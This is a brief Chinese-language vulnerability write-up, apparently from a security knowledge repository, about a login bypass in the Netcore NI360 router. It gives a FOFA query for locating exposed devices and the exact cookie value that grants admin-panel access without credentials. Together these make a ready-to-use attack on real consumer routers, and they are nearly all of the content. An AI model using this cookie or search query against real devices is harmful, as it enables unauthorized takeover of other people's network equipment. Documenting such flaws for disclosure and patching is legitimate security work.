menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 磊科NI360路由器登录绕过漏洞 chevron_right 磊科NI360路由器登录绕过漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    磊科NI360路由器登录绕过漏洞.md
    489 B / 2021-07-15 19:46:52
        # 磊科NI360路由器登录绕过漏洞

## 漏洞描述

磊科NI360路由器存在登录绕过漏洞,通过添加cookie可直接进入后台

## 漏洞影响

> 磊科 NI360路由器

## FOFA

> title="Netcore"

## 漏洞分析

登录页面如下:

![1](/resource/磊科NI360路由器/1.png)

通过添加特定的cookie,然后刷新网页即可进入后台。

```
netcore_login=guest:1
```

![2](/resource/磊科NI360路由器/2.png)

![3](/resource/磊科NI360路由器/3.png)
    links
    file_download